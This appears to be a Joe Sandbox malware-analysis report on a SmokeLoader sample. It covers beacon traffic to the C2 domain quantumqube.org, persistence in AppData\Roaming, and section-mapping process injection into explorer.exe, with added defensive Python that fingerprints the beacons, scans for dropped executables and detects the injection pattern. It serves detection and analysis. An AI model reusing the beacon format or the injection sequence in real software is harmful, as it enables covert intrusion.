                                                                                                                                    Date: Sun, 06 Oct 2024 19:30:05 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0
Oct 6, 2024 21:30:06.047552109 CEST | 235 | IN | HTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:30:05 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0
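The four sessions above share one shape: explorer.exe (PID 4084) POSTs a 109-byte body to http://quantumqube.org/index.php with a Referer pointing at a different, random-looking domain each time, the same IE11/Trident User-Agent, and receives a "404 Not Found" whose chunked body is 47 bytes of binary data rather than an HTML error page. The script below is an added example, not part of the Joe Sandbox report: it rebuilds the request headers from the header lines shown, checks them against the report's "Bytes transferred" column (281, 284, 280, 282 bytes; the difference is exactly the Referer length), de-chunks the complete 404 response, and flags the indicators a detection engineer would key on. The request body is not embedded because the report prints only its first 82 bytes; the indicator names are this example's own, and reading the first dword of the 404 payload as a length prefix is an assumption that the bytes happen to satisfy (0x2b = 43, and 43 bytes follow).

```python
"""Re-check and fingerprint the SmokeLoader-style C2 sessions listed in the report.

Added example (not part of the Joe Sandbox report). Header lines, Referer values,
byte counts and the complete 404 reply are copied from the report; indicator
names and the length-prefix reading of the reply body are assumptions.
"""
from __future__ import annotations
from urllib.parse import urlparse

# (session id, "Bytes transferred" for the request headers, Referer) as reported.
SESSIONS = [
    (10, 281, "http://raievqxnfbig.com/"),
    (11, 284, "http://vvywjtocjkatexf.net/"),
    (12, 280, "http://mxfkxoyxtgh.com/"),
    (13, 282, "http://qxdsgfawkutaw.com/"),
]
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
C2_HOST = "quantumqube.org"
BODY_LEN = 109  # Content-Length of the encrypted POST body in every session


def build_request(referer: str) -> bytes:
    """Rebuild the request header block exactly as the report shows it (CRLF lines, blank terminator)."""
    lines = [
        "POST /index.php HTTP/1.1",
        "Connection: Keep-Alive",
        "Content-Type: application/x-www-form-urlencoded",
        "Accept: */*",
        f"Referer: {referer}",
        f"User-Agent: {USER_AGENT}",
        f"Content-Length: {BODY_LEN}",
        f"Host: {C2_HOST}",
        "", "",
    ]
    return "\r\n".join(lines).encode()


# The 404 reply is byte-identical in every session (session 10's Date shown): 177 header + 58 body bytes.
RESPONSE_HEADERS = (
    "HTTP/1.1 404 Not Found\r\nServer: nginx/1.22.1\r\nDate: Sun, 06 Oct 2024 19:29:11 GMT\r\n"
    "Content-Type: text/html; charset=utf-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\n\r\n"
).encode()
RESPONSE_BODY = bytes.fromhex(
    "32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e "
    "b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a"
)


def check_report_sizes() -> dict[int, bool]:
    """Per session: does the rebuilt header block match the report's byte count?"""
    return {sid: len(build_request(ref)) == nbytes for sid, nbytes, ref in SESSIONS}


def response_size() -> int:
    """Total bytes of the 404 reply; the report records 235 for each IN row."""
    return len(RESPONSE_HEADERS) + len(RESPONSE_BODY)


def dechunk(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body ("2f\\r\\n<47 bytes>\\r\\n0\\r\\n\\r\\n") into the raw payload."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)  # hex size, chunk extensions ignored
        pos = end + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that follows the chunk data


def parse_headers(raw: bytes) -> dict[str, str]:
    """Request line under "_request", header names lower-cased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    request_line, *lines = head.split("\r\n")
    hdrs = {"_request": request_line}
    for line in lines:
        name, _, value = line.partition(":")
        hdrs[name.strip().lower()] = value.strip()
    return hdrs


def beacon_indicators(raw_request: bytes, response_body: bytes) -> list[str]:
    """Indicators visible in the traffic: POST to /index.php, a Referer host that never equals
    the Host header, the fixed Trident/7.0 UA, and a 404 whose chunked body is binary and
    (assumed) length-prefixed. Names are this example's own."""
    h = parse_headers(raw_request)
    hits = []
    if h["_request"].startswith("POST /index.php "):
        hits.append("post_index_php")
    ref_host = urlparse(h.get("referer", "")).hostname
    if ref_host and ref_host != h.get("host"):
        hits.append(f"referer_host_mismatch:{ref_host}")
    if "Trident/7.0" in h.get("user-agent", ""):
        hits.append("trident_ua")
    payload = dechunk(response_body)
    if any(b > 0x7E or (b < 0x20 and b not in b"\r\n\t") for b in payload):
        hits.append("binary_404_body")  # text/html declared, non-text bytes delivered
    if len(payload) >= 4 and int.from_bytes(payload[:4], "little") == len(payload) - 4:
        hits.append(f"length_prefixed_payload:{len(payload) - 4}")  # assumption: leading dword is a length
    return hits


if __name__ == "__main__":
    print("header sizes match report:", check_report_sizes(), "reply bytes:", response_size())
    for sid, _, ref in SESSIONS:
        print(sid, beacon_indicators(build_request(ref), RESPONSE_BODY))
```

Run stand-alone it prints the same four indicators for every session; the only field that changes from beacon to beacon is the Referer, which is why a Host/Referer mismatch on a fixed-size POST to /index.php is a more durable signature than any one of the throwaway domains.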


                                                                                                                                    Target ID:0
                                                                                                                                    Start time:15:26:06
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:37'888 bytes
                                                                                                                                    MD5 hash:8E177D78AE583957804B5A933D6A3F1E
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:15:26:11
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                    Imagebase:0x7ff62d7d0000
                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:15:26:31
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\hfetwhc
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\hfetwhc
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:37'888 bytes
                                                                                                                                    MD5 hash:8E177D78AE583957804B5A933D6A3F1E
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\hfetwhc, Author: Joe Security
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 47%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true
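Target 4 is the persistence copy: the sample (MD5 8E177D78AE583957804B5A933D6A3F1E, 37'888 bytes) re-executes as C:\Users\user\AppData\Roaming\hfetwhc, an extensionless file dropped directly in the Roaming profile. The scanner below is an added example, not part of the Joe Sandbox report or of any tooling it describes: it walks the top level of a Roaming profile, keeps only extensionless regular files whose bytes carry a valid MZ/PE header, hashes them, and marks any whose MD5 matches the sample. The directory it scans is a constructed temporary fixture (a minimal PE stub named hfetwhc plus two decoys) so the example runs offline; point scan_roaming_profile at a real %APPDATA% to use it, and extend KNOWN_MD5 with your own indicators.

```python
"""Hunt for extensionless PE files dropped in a user's Roaming profile.

Added example, not part of the Joe Sandbox report. KNOWN_MD5 holds the sample's
hash from the report; the fixture tree is constructed here for an offline run.
"""
from __future__ import annotations
import hashlib
import struct
import tempfile
from pathlib import Path

# MD5 of the submitted sample and of the dropped hfetwhc file, as recorded in the report.
KNOWN_MD5 = {"8e177d78ae583957804b5a933d6a3f1e"}


def is_pe(data: bytes) -> bool:
    """True if the bytes start with "MZ" and e_lfanew (offset 0x3C) points at a "PE\\0\\0" signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def scan_roaming_profile(root: Path) -> list[dict]:
    """Extensionless regular files directly under root that are PE images, with MD5 and a known-sample flag."""
    findings = []
    for entry in sorted(root.iterdir()):
        if not entry.is_file() or entry.suffix:
            continue  # skip sub-directories and anything with an extension
        data = entry.read_bytes()
        if not is_pe(data):
            continue
        digest = hashlib.md5(data).hexdigest()
        findings.append({"path": str(entry), "size": len(data), "md5": digest,
                         "known_sample": digest in KNOWN_MD5})
    return findings


def build_fixture() -> Path:
    """Constructed stand-in for %APPDATA%\\Roaming: a minimal PE stub with the dropped file's name plus decoys."""
    root = Path(tempfile.mkdtemp())
    stub = bytearray(0x80)
    stub[:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x40)   # e_lfanew -> 0x40
    stub[0x40:0x44] = b"PE\x00\x00"
    (root / "hfetwhc").write_bytes(bytes(stub))  # name from the report; contents are a constructed stub
    (root / "notes").write_text("not a PE")      # extensionless, but no MZ header
    (root / "Microsoft").mkdir()                 # directory, skipped
    return root


if __name__ == "__main__":
    for hit in scan_roaming_profile(build_fixture()):
        print(hit)
```

On a live host the constructed stub would of course hash to something else; the known-sample flag is a convenience, and the real signal is any PE image sitting extensionless at the root of the Roaming profile, which is not where a legitimate installer puts executables.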

                                                                                                                                    Target ID:7
                                                                                                                                    Start time:15:27:37
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:8
                                                                                                                                    Start time:15:27:38
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                    Imagebase:0x7ff62d7d0000
                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:9
                                                                                                                                    Start time:15:27:40
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:10
                                                                                                                                    Start time:15:27:41
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                    Imagebase:0x7ff62d7d0000
                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:11
                                                                                                                                    Start time:15:27:42
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:12
                                                                                                                                    Start time:15:27:43
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                    Imagebase:0x7ff62d7d0000
                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:13
                                                                                                                                    Start time:15:27:44
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:16
                                                                                                                                    Start time:15:30:01
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\hfetwhc
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\hfetwhc
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:37'888 bytes
                                                                                                                                    MD5 hash:8E177D78AE583957804B5A933D6A3F1E
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false


                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:13.9%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:46.1%
                                                                                                                                      Total number of Nodes:128
                                                                                                                                      Total number of Limit Nodes:5
execution_graph (rendered call graph; node serialization summarised, addresses as printed):
• 4019c0 -> 4019e1 -> 401597 (or straight to the exit at 4019f2); 40197f and 40198d reach the same 4019e1 block after a Sleep call at 4019c6
• 401597 / 4015a2 -> 4015a6 -> 401643 NtDuplicateObject -> 401660 NtCreateSection -> 401686 NtMapViewOfSection -> 4016a9 NtMapViewOfSection -> 4016c7 -> 4016e0 NtCreateSection -> 40170c -> 401716 NtMapViewOfSection -> 40173d NtMapViewOfSection -> 40175f; every failed call falls through to 40175f, which returns to 4019f2
• 4023b0, 40249e, 40250f, 402595, 4024bc, 40246e and 402600 enter a registry walk (loop heads 4024f6, 40252b, 4025bd, 402601) that calls 402626 NtOpenKey, 4026bd NtEnumerateKey, 4026e3 NtEnumerateKey and 402726 NtClose until it exits at 402501 or 40273a
• 402ec9, 402e90, 402c6c and 402fa5 dispatch into the registry walk (4023b0, then 40249e from 402f06) and, via 402f16, into the Sleep/section-mapping routine at 40197f, ending at 402f56 or 402be2
• 402ffc -> 403026 -> 4030e1 RtlCreateUserThread, NtTerminateProcess -> 40313f

                                                                                                                                      Control-flow Graph

control_flow_graph (rendered basic-block graph; serialization summarised): function at 401597, blocks 401597-40197c. Calls to 401232 at 4015c7 and 401973; API-calling blocks 401643 (NtDuplicateObject), 401660 and 4016e0 (NtCreateSection), 401686, 4016a9, 401716 and 40173d (NtMapViewOfSection). Each failed call branches to the common exit block at 401923; the success path ends at 40175f with a call to 401764.
                                                                                                                                      APIs
                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                      • Opcode ID: 4bd35a49a1b245d18956b9a677ee802fbaaf2513d6b9e69c058e48c39028dee8
                                                                                                                                      • Instruction ID: 85d8d5eeeb7c1a6f455d1051bc3e68dc495f37d080ff889bc09c670f702c8de1
                                                                                                                                      • Opcode Fuzzy Hash: 4bd35a49a1b245d18956b9a677ee802fbaaf2513d6b9e69c058e48c39028dee8
                                                                                                                                      • Instruction Fuzzy Hash: EC613DB5600245FFEB209F91CC49FAF7BB8EF85710F10412AF912BA1E5D6749901DB25
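The API listing above for the function at 401597 (the graphs that follow for 4015a2 and 4015ae are alternate entry points into the same body and print the same seven calls) is the section-mapping form of process injection. NtDuplicateObject with Options 0x2 (DUPLICATE_SAME_ACCESS) is followed by a first section created PAGE_READWRITE (0x4) and mapped into both the current process and a second process, then a second section created with SECTION_MAP_READ|WRITE|EXECUTE (0xE) and PAGE_EXECUTE_READWRITE (0x40), mapped locally with PAGE_READWRITE (0x4) at 401732 and into the other process with PAGE_EXECUTE_READ (0x20) at 401754. The payload is written through the local writable view and becomes executable in the target through the remote view, so no WriteProcessMemory or VirtualAllocEx ever appears; the SmokeLoader Yara hits in the explorer.exe processes (Targets 11 and 12) are consistent with explorer.exe being that target. The detector below is an added example, not Joe Sandbox's or the sample's code: it parses lines in the report's "APIs" format (the sample trace is constructed from the listing above) and assumes that the 000000FF value is how this report renders the NtCurrentProcess() pseudo-handle (-1).

```python
"""Flag section-mapping process injection in a Joe Sandbox 'APIs' listing.

Added example, not Joe Sandbox or SmokeLoader code. The trace below is
constructed from the API lines the report prints for the function at
401597; the rendering of NtCurrentProcess() (-1) as 000000FF is assumed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the seven API lines from the control-flow graph.
SAMPLE_TRACE = """
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
"""

LINE_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")

# winnt.h page protections: bits that grant execute, and bits that grant write.
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80
PAGE_WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80
# Assumed rendering of the NtCurrentProcess() pseudo-handle (-1) in this report.
CURRENT_PROCESS = {0xFF, 0xFFFFFFFF}


@dataclass
class ApiCall:
    name: str
    args: List[Optional[int]]   # None where the sandbox printed '?'
    ref: int                    # return address of the call site


def parse_trace(text: str) -> List[ApiCall]:
    """Turn '• Name.MODULE(a,b,...), ref: XXXXXXXX' lines into ApiCall records."""
    calls = []
    for m in LINE_RE.finditer(text):
        name, _module, argstr, ref = m.groups()
        args = [None if a.strip() in ("?", "") else int(a, 16)
                for a in argstr.split(",")]
        calls.append(ApiCall(name, args, int(ref, 16)))
    return calls


def has_bits(value: Optional[int], mask: int) -> bool:
    return value is not None and bool(value & mask)


def find_section_injection(calls: List[ApiCall]) -> List[dict]:
    """Pair an executable section with a local writable view (the staging
    copy) and a remote executable view of it (the hand-off into the target).

    Argument positions follow the ntdll prototypes:
      NtCreateSection(SectionHandle, DesiredAccess, ObjectAttributes,
                      MaximumSize, SectionPageProtection, AllocationAttributes,
                      FileHandle)
      NtMapViewOfSection(SectionHandle, ProcessHandle, BaseAddress, ZeroBits,
                         CommitSize, SectionOffset, ViewSize,
                         InheritDisposition, AllocationType, Win32Protect)
    """
    findings = []
    section_ref = None      # most recent section created with execute protection
    local_rw_ref = None     # most recent local writable view of that section
    for c in calls:
        if c.name == "NtCreateSection" and len(c.args) >= 5:
            if has_bits(c.args[4], PAGE_EXECUTE_MASK):
                section_ref, local_rw_ref = c.ref, None
        elif c.name == "NtMapViewOfSection" and len(c.args) >= 10:
            proc, protect = c.args[1], c.args[9]
            remote = proc not in CURRENT_PROCESS   # '?' or a real handle value
            if section_ref is None:
                continue                           # no executable section yet
            if not remote and has_bits(protect, PAGE_WRITE_MASK):
                local_rw_ref = c.ref
            elif remote and has_bits(protect, PAGE_EXECUTE_MASK):
                findings.append({
                    "section_ref": section_ref,
                    "local_rw_ref": local_rw_ref,
                    "remote_map_ref": c.ref,
                    "remote_protect": protect,
                })
    return findings


def verdict(text: str) -> str:
    findings = find_section_injection(parse_trace(text))
    if not findings:
        return "no section-mapping injection pattern"
    f = findings[0]
    return ("section-mapping injection: executable section @{:08X}, "
            "local RW view @{:08X}, remote view @{:08X} with protection 0x{:02X}"
            ).format(f["section_ref"], f["local_rw_ref"] or 0,
                     f["remote_map_ref"], f["remote_protect"])


if __name__ == "__main__":
    print(verdict(SAMPLE_TRACE))
```

The first section (PAGE_READWRITE, mapped remotely at 4016C0 with protection 0x4) is deliberately not flagged: a writable but non-executable remote view on its own is what legitimate shared-memory users do, and the rule fires only on the executable remote view of a section that the same trace has already mapped writable locally. The same parser can be pointed at any other "APIs" block in this report.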

                                                                                                                                      Control-flow Graph

control_flow_graph (rendered basic-block graph; serialization summarised): function at 4015a2, blocks 4015a2-40197c, an alternate entry into the body of 401597. Calls to 401232 at 4015c7 and 401973; API-calling blocks 401643 (NtDuplicateObject), 401660 and 4016e0 (NtCreateSection), 401686, 4016a9, 401716 and 40173d (NtMapViewOfSection). Each failed call branches to the common exit block at 401923; the success path ends at 40175f with a call to 401764.
                                                                                                                                      APIs
                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 550af55b5c33a16d76ad9188aa3b48c23daf6e7e6acb27d056da92f91d001912
• Instruction ID: a0af025894150f1e49885bea0be4db9ca11602f8d27e405362ed464290d16070
